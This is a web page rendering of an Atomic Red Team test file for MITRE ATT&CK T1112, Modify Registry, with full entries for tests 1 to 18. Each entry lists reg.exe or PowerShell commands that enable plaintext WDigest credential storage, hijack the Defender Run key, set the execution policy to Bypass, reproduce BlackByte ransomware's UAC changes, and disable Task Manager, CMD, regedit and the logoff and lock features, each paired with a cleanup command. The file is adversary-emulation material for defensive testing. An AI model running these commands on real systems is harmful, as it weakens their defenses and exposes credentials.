security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1112/T1112.md
T
Atomic Red Team doc generator 762f0548a1 Generated docs from job=generate-docs branch=master [ci skip]
2025-05-01 15:13:41 +00:00

3297 lines
95 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# T1112 - Modify Registry
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1112)
<blockquote>
Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.
Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.
The Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
Finally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Modify Registry of Current User Profile - cmd](#atomic-test-1---modify-registry-of-current-user-profile---cmd)
- [Atomic Test #2 - Modify Registry of Local Machine - cmd](#atomic-test-2---modify-registry-of-local-machine---cmd)
- [Atomic Test #3 - Modify registry to store logon credentials](#atomic-test-3---modify-registry-to-store-logon-credentials)
- [Atomic Test #4 - Use Powershell to Modify registry to store logon credentials](#atomic-test-4---use-powershell-to-modify-registry-to-store-logon-credentials)
- [Atomic Test #5 - Add domain to Trusted sites Zone](#atomic-test-5---add-domain-to-trusted-sites-zone)
- [Atomic Test #6 - Javascript in registry](#atomic-test-6---javascript-in-registry)
- [Atomic Test #7 - Change Powershell Execution Policy to Bypass](#atomic-test-7---change-powershell-execution-policy-to-bypass)
- [Atomic Test #8 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-8---blackbyte-ransomware-registry-changes---cmd)
- [Atomic Test #9 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-9---blackbyte-ransomware-registry-changes---powershell)
- [Atomic Test #10 - Disable Windows Registry Tool](#atomic-test-10---disable-windows-registry-tool)
- [Atomic Test #11 - Disable Windows CMD application](#atomic-test-11---disable-windows-cmd-application)
- [Atomic Test #12 - Disable Windows Task Manager application](#atomic-test-12---disable-windows-task-manager-application)
- [Atomic Test #13 - Disable Windows Notification Center](#atomic-test-13---disable-windows-notification-center)
- [Atomic Test #14 - Disable Windows Shutdown Button](#atomic-test-14---disable-windows-shutdown-button)
- [Atomic Test #15 - Disable Windows LogOff Button](#atomic-test-15---disable-windows-logoff-button)
- [Atomic Test #16 - Disable Windows Change Password Feature](#atomic-test-16---disable-windows-change-password-feature)
- [Atomic Test #17 - Disable Windows Lock Workstation Feature](#atomic-test-17---disable-windows-lock-workstation-feature)
- [Atomic Test #18 - Activate Windows NoDesktop Group Policy Feature](#atomic-test-18---activate-windows-nodesktop-group-policy-feature)
- [Atomic Test #19 - Activate Windows NoRun Group Policy Feature](#atomic-test-19---activate-windows-norun-group-policy-feature)
- [Atomic Test #20 - Activate Windows NoFind Group Policy Feature](#atomic-test-20---activate-windows-nofind-group-policy-feature)
- [Atomic Test #21 - Activate Windows NoControlPanel Group Policy Feature](#atomic-test-21---activate-windows-nocontrolpanel-group-policy-feature)
- [Atomic Test #22 - Activate Windows NoFileMenu Group Policy Feature](#atomic-test-22---activate-windows-nofilemenu-group-policy-feature)
- [Atomic Test #23 - Activate Windows NoClose Group Policy Feature](#atomic-test-23---activate-windows-noclose-group-policy-feature)
- [Atomic Test #24 - Activate Windows NoSetTaskbar Group Policy Feature](#atomic-test-24---activate-windows-nosettaskbar-group-policy-feature)
- [Atomic Test #25 - Activate Windows NoTrayContextMenu Group Policy Feature](#atomic-test-25---activate-windows-notraycontextmenu-group-policy-feature)
- [Atomic Test #26 - Activate Windows NoPropertiesMyDocuments Group Policy Feature](#atomic-test-26---activate-windows-nopropertiesmydocuments-group-policy-feature)
- [Atomic Test #27 - Hide Windows Clock Group Policy Feature](#atomic-test-27---hide-windows-clock-group-policy-feature)
- [Atomic Test #28 - Windows HideSCAHealth Group Policy Feature](#atomic-test-28---windows-hidescahealth-group-policy-feature)
- [Atomic Test #29 - Windows HideSCANetwork Group Policy Feature](#atomic-test-29---windows-hidescanetwork-group-policy-feature)
- [Atomic Test #30 - Windows HideSCAPower Group Policy Feature](#atomic-test-30---windows-hidescapower-group-policy-feature)
- [Atomic Test #31 - Windows HideSCAVolume Group Policy Feature](#atomic-test-31---windows-hidescavolume-group-policy-feature)
- [Atomic Test #32 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-32---windows-modify-show-compress-color-and-info-tip-registry)
- [Atomic Test #33 - Windows Powershell Logging Disabled](#atomic-test-33---windows-powershell-logging-disabled)
- [Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode without Network](#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-without-network)
- [Atomic Test #35 - Windows Add Registry Value to Load Service in Safe Mode with Network](#atomic-test-35---windows-add-registry-value-to-load-service-in-safe-mode-with-network)
- [Atomic Test #36 - Disable Windows Toast Notifications](#atomic-test-36---disable-windows-toast-notifications)
- [Atomic Test #37 - Disable Windows Security Center Notifications](#atomic-test-37---disable-windows-security-center-notifications)
- [Atomic Test #38 - Suppress Win Defender Notifications](#atomic-test-38---suppress-win-defender-notifications)
- [Atomic Test #39 - Allow RDP Remote Assistance Feature](#atomic-test-39---allow-rdp-remote-assistance-feature)
- [Atomic Test #40 - NetWire RAT Registry Key Creation](#atomic-test-40---netwire-rat-registry-key-creation)
- [Atomic Test #41 - Ursnif Malware Registry Key Creation](#atomic-test-41---ursnif-malware-registry-key-creation)
- [Atomic Test #42 - Terminal Server Client Connection History Cleared](#atomic-test-42---terminal-server-client-connection-history-cleared)
- [Atomic Test #43 - Disable Windows Error Reporting Settings](#atomic-test-43---disable-windows-error-reporting-settings)
- [Atomic Test #44 - DisallowRun Execution Of Certain Applications](#atomic-test-44---disallowrun-execution-of-certain-applications)
- [Atomic Test #45 - Enabling Restricted Admin Mode via Command_Prompt](#atomic-test-45---enabling-restricted-admin-mode-via-command_prompt)
- [Atomic Test #46 - Mimic Ransomware - Enable Multiple User Sessions](#atomic-test-46---mimic-ransomware---enable-multiple-user-sessions)
- [Atomic Test #47 - Mimic Ransomware - Allow Multiple RDP Sessions per User](#atomic-test-47---mimic-ransomware---allow-multiple-rdp-sessions-per-user)
- [Atomic Test #48 - Event Viewer Registry Modification - Redirection URL](#atomic-test-48---event-viewer-registry-modification---redirection-url)
- [Atomic Test #49 - Event Viewer Registry Modification - Redirection Program](#atomic-test-49---event-viewer-registry-modification---redirection-program)
- [Atomic Test #50 - Enabling Remote Desktop Protocol via Remote Registry](#atomic-test-50---enabling-remote-desktop-protocol-via-remote-registry)
- [Atomic Test #51 - Disable Win Defender Notification](#atomic-test-51---disable-win-defender-notification)
- [Atomic Test #52 - Disable Windows OS Auto Update](#atomic-test-52---disable-windows-os-auto-update)
- [Atomic Test #53 - Disable Windows Auto Reboot for current logon user](#atomic-test-53---disable-windows-auto-reboot-for-current-logon-user)
- [Atomic Test #54 - Windows Auto Update Option to Notify before download](#atomic-test-54---windows-auto-update-option-to-notify-before-download)
- [Atomic Test #55 - Do Not Connect To Win Update](#atomic-test-55---do-not-connect-to-win-update)
- [Atomic Test #56 - Tamper Win Defender Protection](#atomic-test-56---tamper-win-defender-protection)
- [Atomic Test #57 - Snake Malware Registry Blob](#atomic-test-57---snake-malware-registry-blob)
- [Atomic Test #58 - Allow Simultaneous Download Registry](#atomic-test-58---allow-simultaneous-download-registry)
- [Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - cmd](#atomic-test-59---modify-internet-zone-protocol-defaults-in-current-user-registry---cmd)
- [Atomic Test #60 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell](#atomic-test-60---modify-internet-zone-protocol-defaults-in-current-user-registry---powershell)
- [Atomic Test #61 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.](#atomic-test-61---activities-to-disable-secondary-authentication-detected-by-modified-registry-value)
- [Atomic Test #62 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.](#atomic-test-62---activities-to-disable-microsoft-fido-aka-fast-identity-online-authentication-detected-by-modified-registry-value)
- [Atomic Test #63 - Scarab Ransomware Defense Evasion Activities](#atomic-test-63---scarab-ransomware-defense-evasion-activities)
- [Atomic Test #64 - Disable Remote Desktop Anti-Alias Setting Through Registry](#atomic-test-64---disable-remote-desktop-anti-alias-setting-through-registry)
- [Atomic Test #65 - Disable Remote Desktop Security Settings Through Registry](#atomic-test-65---disable-remote-desktop-security-settings-through-registry)
- [Atomic Test #66 - Disabling ShowUI Settings of Windows Error Reporting (WER)](#atomic-test-66---disabling-showui-settings-of-windows-error-reporting-wer)
- [Atomic Test #67 - Enable Proxy Settings](#atomic-test-67---enable-proxy-settings)
- [Atomic Test #68 - Set-Up Proxy Server](#atomic-test-68---set-up-proxy-server)
- [Atomic Test #69 - RDP Authentication Level Override](#atomic-test-69---rdp-authentication-level-override)
- [Atomic Test #70 - Enable RDP via Registry (fDenyTSConnections)](#atomic-test-70---enable-rdp-via-registry-fdenytsconnections)
- [Atomic Test #71 - Disable Windows Prefetch Through Registry](#atomic-test-71---disable-windows-prefetch-through-registry)
- [Atomic Test #72 - Setting Shadow key in Registry for RDP Shadowing](#atomic-test-72---setting-shadow-key-in-registry-for-rdp-shadowing)
- [Atomic Test #73 - Flush Shimcache](#atomic-test-73---flush-shimcache)
- [Atomic Test #74 - Disable Windows Remote Desktop Protocol](#atomic-test-74---disable-windows-remote-desktop-protocol)
- [Atomic Test #75 - Enforce Smart Card Authentication Through Registry](#atomic-test-75---enforce-smart-card-authentication-through-registry)
- [Atomic Test #76 - Requires the BitLocker PIN for Pre-boot authentication](#atomic-test-76---requires-the-bitlocker-pin-for-pre-boot-authentication)
- [Atomic Test #77 - Modify EnableBDEWithNoTPM Registry entry](#atomic-test-77---modify-enablebdewithnotpm-registry-entry)
- [Atomic Test #78 - Modify UseTPM Registry entry](#atomic-test-78---modify-usetpm-registry-entry)
- [Atomic Test #79 - Modify UseTPMPIN Registry entry](#atomic-test-79---modify-usetpmpin-registry-entry)
- [Atomic Test #80 - Modify UseTPMKey Registry entry](#atomic-test-80---modify-usetpmkey-registry-entry)
- [Atomic Test #81 - Modify UseTPMKeyPIN Registry entry](#atomic-test-81---modify-usetpmkeypin-registry-entry)
- [Atomic Test #82 - Modify EnableNonTPM Registry entry](#atomic-test-82---modify-enablenontpm-registry-entry)
- [Atomic Test #83 - Modify UsePartialEncryptionKey Registry entry](#atomic-test-83---modify-usepartialencryptionkey-registry-entry)
- [Atomic Test #84 - Modify UsePIN Registry entry](#atomic-test-84---modify-usepin-registry-entry)
- [Atomic Test #85 - Abusing Windows TelemetryController Registry Key for Persistence](#atomic-test-85---abusing-windows-telemetrycontroller-registry-key-for-persistence)
- [Atomic Test #86 - Modify RDP-Tcp Initial Program Registry Entry](#atomic-test-86---modify-rdp-tcp-initial-program-registry-entry)
- [Atomic Test #87 - Abusing MyComputer Disk Cleanup Path for Persistence](#atomic-test-87---abusing-mycomputer-disk-cleanup-path-for-persistence)
- [Atomic Test #88 - Abusing MyComputer Disk Fragmentation Path for Persistence](#atomic-test-88---abusing-mycomputer-disk-fragmentation-path-for-persistence)
- [Atomic Test #89 - Abusing MyComputer Disk Backup Path for Persistence](#atomic-test-89---abusing-mycomputer-disk-backup-path-for-persistence)
- [Atomic Test #90 - Adding custom paths for application execution](#atomic-test-90---adding-custom-paths-for-application-execution)
<br/>
## Atomic Test #1 - Modify Registry of Current User Profile - cmd
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
**Supported Platforms:** Windows
**auto_generated_guid:** 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #2 - Modify Registry of Local Machine - cmd
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
**Supported Platforms:** Windows
**auto_generated_guid:** 282f929a-6bc5-42b8-bd93-960c3ba35afe
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
```
#### Cleanup Commands:
```cmd
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #3 - Modify registry to store logon credentials
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
**Supported Platforms:** Windows
**auto_generated_guid:** c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #4 - Use Powershell to Modify registry to store logon credentials
Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
**Supported Platforms:** Windows
**auto_generated_guid:** 68254a85-aa42-4312-a695-38b7276307f8
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential' -Value '1' -ErrorAction Ignore
```
#### Cleanup Commands:
```powershell
Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential' -Value '0' -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #5 - Add domain to Trusted sites Zone
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
**Supported Platforms:** Windows
**auto_generated_guid:** cf447677-5a4e-4937-a82c-e47d254afd57
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bad_domain | Domain to add to trusted site zone | string | bad-domain.com|
#### Attack Commands: Run with `powershell`!
```powershell
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
new-itemproperty $key$name -Name http -Value 2 -Type DWORD;
new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
```
#### Cleanup Commands:
```powershell
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
Remove-item $key -Recurse -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #6 - Javascript in registry
Upon execution, a javascript block will be placed in the registry for persistence.
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
**Supported Platforms:** Windows
**auto_generated_guid:** 15f44ea9-4571-4837-be9e-802431a7bfae
#### Attack Commands: Run with `powershell`!
```powershell
New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "<script>"
```
#### Cleanup Commands:
```powershell
Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #7 - Change Powershell Execution Policy to Bypass
Attackers need to change the powershell execution policy in order to run their malicious powershell scripts.
They can either specify it during the execution of the powershell script or change the registry value for it.
**Supported Platforms:** Windows
**auto_generated_guid:** f3a6cceb-06c9-48e5-8df8-8867a6814245
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| default_execution_policy | Specify the default poweshell execution policy | string | Default|
#### Attack Commands: Run with `powershell`!
```powershell
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
```
#### Cleanup Commands:
```powershell
try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine -Force } catch {}
```
<br/>
<br/>
## Atomic Test #8 - BlackByte Ransomware Registry Changes - CMD
This task recreates the steps taken by BlackByte ransomware before it worms to other machines. See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
The steps are as follows:
<ol>
<li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
<li>2. Enable OS to share network connections between different privilege levels</li>
<li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
</ol>
The registry keys and their respective values will be created upon successful execution.
**Supported Platforms:** Windows
**auto_generated_guid:** 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #9 - BlackByte Ransomware Registry Changes - Powershell
This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell. See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
The steps are as follows:
<ol>
<li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
<li>2. Enable OS to share network connections between different privilege levels</li>
<li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
</ol>
The registry keys and their respective values will be created upon successful execution.
**Supported Platforms:** Windows
**auto_generated_guid:** 0b79c06f-c788-44a2-8630-d69051f1123d
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
```
#### Cleanup Commands:
```powershell
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #10 - Disable Windows Registry Tool
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
**Supported Platforms:** Windows
**auto_generated_guid:** ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #11 - Disable Windows CMD application
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
**Supported Platforms:** Windows
**auto_generated_guid:** d2561a6d-72bd-408c-b150-13efe1801c2a
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1
```
#### Cleanup Commands:
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #12 - Disable Windows Task Manager application
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
**Supported Platforms:** Windows
**auto_generated_guid:** af254e70-dd0e-4de6-9afe-a994d9ea8b62
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #13 - Disable Windows Notification Center
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
**Supported Platforms:** Windows
**auto_generated_guid:** c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #14 - Disable Windows Shutdown Button
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
**Supported Platforms:** Windows
**auto_generated_guid:** 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #15 - Disable Windows LogOff Button
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
**Supported Platforms:** Windows
**auto_generated_guid:** e246578a-c24d-46a7-9237-0213ff86fb0c
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #16 - Disable Windows Change Password Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
**Supported Platforms:** Windows
**auto_generated_guid:** d4a6da40-618f-454d-9a9e-26af552aaeb0
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #17 - Disable Windows Lock Workstation Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
**Supported Platforms:** Windows
**auto_generated_guid:** 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #18 - Activate Windows NoDesktop Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** Windows
**auto_generated_guid:** 93386d41-525c-4a1b-8235-134a628dee17
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /f >nul 2>&1
```
<br/>
<br/>
